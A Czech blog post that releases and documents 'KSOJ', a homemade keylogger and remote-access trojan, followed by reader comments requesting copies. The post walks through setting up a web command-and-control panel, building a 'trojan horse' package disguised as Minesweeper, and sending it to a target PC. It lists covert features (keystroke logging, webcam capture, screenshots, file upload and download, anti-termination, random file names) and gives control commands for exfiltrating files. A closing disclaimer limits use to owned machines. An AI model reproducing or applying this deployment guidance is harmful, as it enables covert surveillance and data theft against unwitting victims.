Kategorie: IT, Hacking, Keyloggery

Projekt Real Time KeyLogger | DOWNLOAD - 3.část

První download realtime keylogeru - program má nyní mnoho zajímavých funkcí a i zlepšené webové prostředí. Jelikož se říká, že základ úspěchu je sdílení informací, dávám hrubou verzi ke stažení a vyzkoušení - nechť slouží k dobru.

Popis programu KeyLog_0.1.9

Program slouží k monitorování a ovládání pc, je určen pro vzdálný přístup a správu svých PC s výhodou nezávislosti na veřejných ip adresách a celkově cestě připojení tzn. že ovládaný notebook, který se připojuje na různých místech k síti internetu je ovládán pořád stejně nezávisle na místě připojení.

Co program umí

  • přístup k příkazové řádce
  • sledování stisků kláves v realném čase na cílovém pc
  • přístup k webové kameře (pouze snímky+upload)
  • ovládání cd-rom (vysunutí/zasunutí)
  • sejmutí printscreenu+upload
  • upload čehokoliv z pc
  • download čehokoliv do pc

    • Pár vtípků

  • zmizení ikon na ploše
  • změna tapety
  • funkce FUCKDESKTOP (printscreen > zmizení ikon > nastavení printsceenu jako tapety)
  • zobrazování hlášek (nedoděláno - hrozí odhalení umístění při zobrazení hlášky)

    • Skryté, ale užitečné

  • vzájemné krytí dvou běžících aplikací -> těžší ukončení (nikoliv nemožné)
  • u každé instalace má *.exe jinačí název

Instalace

Stáhněte si tento archiv: zkušební verze již není ke stažení

Poskytuji pouze časově omezenou verzi KeyLogu, důvodů je více: neustálý vývoj, omezení brutálního šíření bude li úspěšný, chci mít kontrolu. Verze, kterou dávám k dispozici je funkční do 1.1.2011

  1. zaregistrujeme si hosting s php a mysql
  2. uploadujeme na náš hosting obsah složky "web"
  3. v souboru na hostingu k/connect.php vyplníme údaje k mysql
  4. v mysql spustíme tyto dotazy pro vytvoření db (například v phpmyadmin viz.obr )
  5. nyní se můžeme přihlásit na této adrese "www.nashosting.cz/k/" (uživatel: admin heslo: root)
  6. složku web můžeme v pc smazat, zůstává nám složka Project KSOJ - tato složka zůstává u vás v pc a pomocí ní můžeme konfigurovat a lehce vytvářet nové KeyLogy

Videotutoriál

Nenechte se zmást WinXP ve virtualboxu :-)

Tak a nyní máme vše připraveno, teď už jen vytvořit náš KeyLog (nastavení pro přihlášení právě na naše webové prostředí) a můžeme posílat

Princip fungování

Aby se program "vnořil" do cílového pc, je třeba zaslat minimálně dva soubory (data.c a *.exe). Po spuštění se buď spustí hra "miny" nebo se nestane nic v závislosti na zvolených parametrechpři vytváření programu (vysvětlení později).

Po spuštění se program zkopíruje do pc a začne funovat jak proces *.exe (náhodný název) tak check.exe. Při prvním spuštění si také vytvoří svoje id na webovém rozhraní, přes které ho pak ovládáme.

Program si stahuje z webového prostředí příkazy, které následně vykonává v příkazové řádce. Tím je nám server s webovým přístupem prostředníkem a nejsou nutné veřejné ip. Při vytvoření daných souborů v adresáři kde je umístěn náš program se spouští speciální funkce (upload, focení webcam atd... - přesný výčet později)

Při zažádání programu o snímek například z webkamery (nebo jinačí soubor), program jej vytvoří, připojí se na ftp a do složky s id KeyLogu uploaduje požadovaný soubor, který pak vidíme přes web. Toť k využití ftp.

Vytvoření infekčního souboru pro aplikaci na cílové pc

  1. ve složce Projekt KSOJ naleznete KSOJ_Builder.exe, spusťte jej
  2. vyplňte minimálně první 4 kolonky, proxy si vysvětlíme jindy :-)
  3. klikněte na "Ověření připojení k hostingu" je li vše ok, formuláře zezelenají
  4. nyní si zvolte zda se mají zobrazit po spuštění "miny" nebo se nestane nic, při aplikaci na své pc není třeba zobrazovat miny, takže jsou tam vlastně zbytečně :-D
  5. klikněte na "Vytvořit trojského koně" a v adresáři kde je KSOJ_Builder.exe by se měl objevit KSOJ.zip, ten stačí zaslat

Soubory uvnitř můžete do jisté míry měnit, například check můžete smazat úplně, ovšem po spuštění si ho bude snažit program natáhnout z internetu. Start.exe můžete měnit v názvu libovolně, ale na windows vista a win7 je třeba aby byl název Setup.exe. Upravený a připravený zip pak můžeme jednoduše zaslat na cílové pc.

Webové rozhraní - popis

Po přihlášení (user: admin pass: root) vidíme menu:

Documentation - vývoj verzí, spíše orientačně co kdy přibylo a zmizelo :-)

Download - obsah adresáře na hostingu k/download/ - slouží k uložení souborů co se můžou hodit v terénu, defaultně obsahuje "check"

My loggers - výpis registrovaných logerů, po spuštění na cílovém pc se zde samy načtou

Settings - nastavení jaké klávesy se ve výpise záznamu stisknutých kláves budou zobrazovat a které ne, pro snadnější orientaci (doporučuji zobrazovat backspace, enter a tab jinak nic)

Položka My Loggers

Loggers ID - jméno uživatele+unixový čas spuštění (jedinečný identifikátor), při kliknutí na tuto položku se zobrazí výpis stisknutých kláves, ten by se mel sám aktualizovat, ale v některých prohlížečích se tak neděje, otestováno na FF

Clear log - smaže záznamy stisknutých kláves (mimo historii)

Del logger - smaže záznamy logeru z webu, pokud je ale aktivní opět se přihlásí

Save - uloží záznam stisknutých kláves do historie a smaže aktuální záznam

History - čísla uložených historií

Command line - Ready / Wait - při ready nečeká už žádný příkaz na stažení logerem, při wait příkaz doposud nebyl stáhnut, poklepáním se dostáváme k ovládání příkazové řádky

Files - soubory které nám loger uploadoval, například snímky z webcamery atd...

Delete - smaže uploadované soubory

V záložce Ready je i několik tlačítek, ty slouží k rychlému odeslání příkazu - jsou to tlačítka pro printscreen, snímek webcamery a cdrom

Odstranění programu z monitorovaného pc

Odstranění je jednoduché, ve složce kde jsme si soubor vytvářeli pomocí KSOJ_Builderu nalezneme i adresář other a v něm uninstall. Ten stačí na ovládaném pc spustit a vše se nám odstraní

Ke zdrojovým kodum

V databázi a celkově na webu naleznete spoustu věcí, které aplikace nevyužívá - důvodem je zveřejnění rozdělaného projektu, některé věci se teprve připravují atd. Na odlehčení a opravení dotazů pro mysql ještě nebyl tak úplně čas :-), v případě, že by si s tím někdo měl zájem pohrát - rád přivítám zlepšení.

Příklady příkazů pro příkazovou řádku

Stažení čehokoliv na dané pc (soubor bude ve složce c:\advance\ )

echo http://adresa_souboru/neco.txt > c:\advance\download

Upload z pc

echo C:\cesta\souboru.txt > c:\advance\upload

Výpis spuštěných aplikací

1.krok - tasklist > c:\advance\task.txt
2.krok - echo C:\advance\task.txt > c:\advance\upload

Vypnutí aplikace

taskkill /f /im calc.exe

Otevření webové stránky

start www.kdosiodjinud.cz

Zmizení / zobrazení ikon na ploše

echo start > c:\advance\icon
echo stop > c:\advance\icon

Změna tapety

echo C:\cesta\k\obrazku.bmp > c:\advance\wallpaper

FUCKDESKTOP - printscreen > zmizení ikon > printscreen jako tapeta

echo start > c:\advance\fuckdesktop

A další meze v používání cmd se meze nekladou, ovládání webcamery a focení printscreenu je pomocí tlačítek pro rychlejší použití

Proč vlastně projekt zveřejňuji

Jsem si vědom některých chyb programu a neustále se je snažím zdokonalovat, nicméně přivítám veškeré připomínky a kritiku. Kdyby měl někdo zájem účastnit se tvorby poskytnu po zvážení i zdrojové kody a spolupráci přivítám. Takže jakékoli problémy prosím hlašte dole v komentářích... :-) Díky a nechť slouží jen k dobrým věcem...

Závěrem ještě upozorňuji, že projekt KSOJ vzniknul, aby vám umožnil vzdálenou správu počítačů, které jsou ve vašem vlastnictví nebo jejichž majitel vám toto vzdálené ovládání povolil. Jakékoliv jiné využití tohoto projektu je protizákonné a jejím zneužitím se vystavujete trestnímu stíhání! Autor na sebe nebere žádnou zodpovědnost za vaše počínání ani za případné škody způsobené používáním tohoto softwaru! Autor si také uděluje právo vědět na jakých adresách webové aplikace běží - pro ochranu proti zneužití.

Autor: icon KdoSiOdJinud / Jan Kuthan
Vydáno: 27.10.2010 9:37
Přečteno: 19807x 		Kupte si notebook v hodnotě 15 000kč za 300kč 5.díl - 2 z 10 způsobů jak můžete přijít o heslo k e... Slovensko už dostává plyn - hurá NaLovu.cz - hacknuto pomocí XSS

Komentáře rss

Přidat komentář >
Strana:  1 2   další »
Jozef, - (15.2.2012 22:13) odpovědět

byl bych vděčný za zaslání archivu!

Beef, Archiv (27.1.2012 11:40) odpovědět

Ahoj. Tak archiv zašleš nebo nezašleš? 1 Jestli ne a čeká se na něco (nová verze apod.), tak si změň text výše, abychom sem o archiv zbytečně nepsali. Pokud ano, tak bych to rád vyzkoušel. Kdyžtak beef-eater@email.cz

icon KdoSiOdJinud / Jan Kuthan odpověděl(a) (27.1.2012 13:26)

Ahoj, nezašlu. Byla to verze funkční jen do určitého data - je to tam psáno. Ale chci spouštět ksoj.g6.cz - jen v posledních měsících absolutně časově nezvládám a navíc ksoj na nějakou dobu změnil i majitele :-D Je to komplikované a v nejbližší době asi ani nebude vyřešené.

Lotus, - (12.1.2012 17:55) odpovědět

Kde si můžu stáhnou tento program ?
Kdyžtak mi ho prosím zašlete na lotusStodola@gmail.co díky

icon KdoSiOdJinud / Jan Kuthan odpověděl(a) (14.1.2012 9:42)

komentář níže, ten pod ním, ten další taky a i ten pod ním atd... odpovídají na tvůj dotaz

BblackK, - (23.11.2011 17:48) odpovědět

Zdravim,
vypadá to suprově, chtěl bych se zeptat kdy se bude možné na webu ksoj.g6.cz opět zaregistrovat, už je to nějaký čas pozastavené.

icon KdoSiOdJinud / Jan Kuthan odpověděl(a) (23.11.2011 23:20)

Ahoj, KSOJ plánuje změnu majitele, ale s tím, že vše bude zachované - je to už jen otázka času, aby vše mohlo pokračovat bez jakých koliv změn :)

Jana, - (6.10.2011 19:53) odpovědět

Ahoj,

chtěla bych smeknout virtuální klobouk před tvým dílem a ráda bych se připojila k zástupu dotazujících - bude nová verze?

icon KdoSiOdJinud / Jan Kuthan odpověděl(a) (20.10.2011 14:35)

Ahoj, bude spuštěna za 5 dní (25.10.2011), ale díky tomu, že registrace bude podmíněná ověřením dopisem, tak bude poskytována až po donate a domluvě, nicméně poskytována bude :)

Petr, R.T.R.K. (25.8.2011 18:29) odpovědět

http://www.ksoj.g6.cz/?p=uvod

Jakub, - (21.8.2011 23:07) odpovědět

Mohu se zeptat, kdy bude ta nová verze, či co to má být? :)
No prostě kdy to bude nastažení, ady se píše cca 3 týdny.. :-) Což už bylo, tak se jen ptám. ;)

icon KdoSiOdJinud / Jan Kuthan odpověděl(a) (22.8.2011 1:18)

Momentálně řeším osobní problémy, zvažuji celé smazání blogu takže s novou verzí opravdu nevím jak to bude.

icon KdoSiOdJinud / Jan Kuthan, Nová verze (8.7.2011 20:34) odpovědět

Pro všechny co mají dotazy, jestli jim zašlu program. Nezašlu :) Již je prakticky dokončená nová verze se společným webovým rozhraním, která bude dostupná pro všechny. Takže vydržet pár týdnů a bude to. Zveřejnění záleží především na testech aplikace, které budu dělat s několika přáteli - když dopadne dobře tak odhaduji do dvou/tří týdnů zveřejnění.

Jakub, program (8.7.2011 20:23) odpovědět

AHoj, můžeš prosím odeslat archív na email kouzelnik3467@gmail.com? Rád bych vyzkoušel. Děkuji a odepiš prosím. 1

Andrej, skuska (6.7.2011 22:51) odpovědět

Mohl bych ho vyzkoušet prosím i já? wow.hanse@gmail.com
THX :)

Anonym, - (6.6.2011 3:39) odpovědět

no vypada to zajimave, ja bych to asi cely do kupy nedal. jen se nemuzu zbavit pocitu ze kdyz se to bude ovladat pres tvuj server a nebudou zverejneny zdrojaky tak bude vysoka pravdepodobnost ze si tam nechas skulinku abys mohl ovladat vsecky klienty a nechal tak vlastne lidi aby ti vytvorili peknej botnet :D ale i tak se tesim az si to aspon na virtualce vyzkousim :D

hacker1985, - (3.6.2011 7:59) odpovědět

No trosku mas mas praudu nakodil som to za asy 30min len ukazka ale inspiroval som stvojim projektom cakam kedy budes mat hotove a budem rad ked mi nechas zverejneni email xxxxxx@atlas.sk

Anonym, FTP rat (2.6.2011 20:23) odpovědět

no tumas linkhacker1985.tym.sk/ 2

icon KdoSiOdJinud / Jan Kuthan odpověděl(a) (2.6.2011 23:06)

způsob bude pravděpodobně stejný, ale je to dost neohrabané nemyslíš? :-) Já u toho svého už spíš pracuji na přístupnosti a na hromadném spracování :-) Btw. důkaz jsem nepotřeboval, takovou aplikaci dokáže napsat kde kdo (netvrdím, že ne). Jde spíše o způsoby řešení, aby třebas i u plošněho použití byl trojan řešený efektivně a co se týče pc, tak pracoval hospodárně. Z videa bohužel nevidím jak jsi dané věci řešil tak je to pro mě dost nicneříkající. 10 Ale tak jo, gratulace mno 1

hacker1985, - (2.6.2011 20:10) odpovědět

hned ti tu dam video ako dvokaz len nahravam na web 2

hacker1985, - (2.6.2011 19:16) odpovědět

ano urcite ked chces poslem ti daco 2

hacker1985, FTP rat (2.6.2011 14:35) odpovědět

aj ja som dacotake napogramoval v DELPHI 7 len sato neovlada cez web satci ob...ftp klient moj email xxxx@atlas.sk 2

icon KdoSiOdJinud / Jan Kuthan odpověděl(a) (2.6.2011 14:44)

Propojením s klientem u "útočníka" získáš prodlevu :-) Připravuji web, kde bude pro všechny uživatele tzv. pod jednou střechou. Tvůj email jsem zeditoval :-) Silně mi hackere připomínáš autora nedopsaného článku na soom.cz :-) Pletu se?

kouzelnik, pošli program pls (22.5.2011 20:39) odpovědět

Ahoj, můžeš mi prosím poslat program na kouzelnik3467@gmail.com jestli ještě odesíláš? :) Díky

svkPEON, - (21.4.2011 15:23) odpovědět

Zdravim, poprosil by som o zaslanie na lebkac@centrum.sk :) diky moc, ozvem sa ake s nim mam skusenosti.

Jerry, - (6.4.2011 20:41) odpovědět

čau,tvůj projekt vypadá dost zajímavě,můžeš mi pro vyzkoušení hotový program zaslat na email martinstancl@email.cz ? děkuji

fancek, - (6.4.2011 9:54) odpovědět

Mohl bych ho vyzkoušet prosím? lagen90@seznam.cz


Strana:  1 2   další »